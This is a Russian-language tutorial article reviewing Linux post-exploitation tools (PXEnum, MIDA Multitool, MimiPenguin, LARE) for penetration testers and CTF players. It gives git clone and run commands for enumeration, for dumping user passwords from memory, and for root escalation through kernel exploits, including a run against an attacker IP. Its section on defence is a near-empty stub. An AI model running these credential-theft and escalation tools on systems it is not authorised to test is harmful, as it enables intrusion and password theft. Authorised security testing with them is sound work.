RuCore.NET

Обзор инструментов пост-эксплуатации





Друзья, сегодня минимум слов, максимум дела! В материале ниже будем смотреть инструменты пост-эксплуатации для систем Linux! Что можно сделать после того как ты уже прорвался во внутренний периметр сети, или, как на CTF-соревнованиях, когда ты получил доступ к уязвимой тачке и готов броситься в бой дальше!

Пост-эксплуатация в практике пен-теста

Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений.



 

Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы.


1. PXEenum — полное перечисление всего что есть в системе

Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время.

 

Для запуска он не требует прав root’а, работает в стандартном терминале.

#  wget //raw.githubusercontent.com/shawnduong/PXEnum/master/PXEnume.sh

Установка:

# git clone //github.com/shawnduong/PXEnum.git
# cd PXEnum/
# chmod +x PXEnum.sh 
# bash PXEnum.sh 


2. MIDA Multitool — палим систему по взрослому

Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно:

SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д.

 

Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев.

Устанавливаем скрипт в систему с github:

# git clone //github.com/NullArray/Bash-Kit-Multitool
# cd Bash-Kit-Multitool
# chmod +x bashkit.sh

Запускаем скрипт:

# /.bashkit.sh

Дело сделано! Можно запускать в системе!


3. MimiPenguin — тырим пароли без зазрения совести

Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей)

Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux.

 

 

Устанавливаем MimiPenguin забирая его с репозитория GitHub:

  # git clone //github.com/huntergregal/mimipenguin
  # cd mimipenguin
  # ls –a
  # chmod +x mimipenguin.sh
  # ./mimipenguin.sh


4. LARE — ломимся под рута используя баги ядра

И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8.

Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP.

Устанавливаем скрипт в систему:

# git clone //github.com/EnigmaDimitri/LARE && cd LARE
# chmod +x LARA.sh
# LARE.sh -a 


Запуск скрипта на целевой машине в сети

# LARE.sh -l [Attackers-IP] 

Запуск на машине с подключением к базе данных эксплойтов на GitHub

# LARE.sh -l or ./LARE.sh -l 


Проверка и защита системы от техник пост-эксплуатации

Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-day или устаревший софт.

 



Поделись статьей с друзьями


453 просмотров



Сообщить об опечатке

Текст, который будет отправлен нашим редакторам: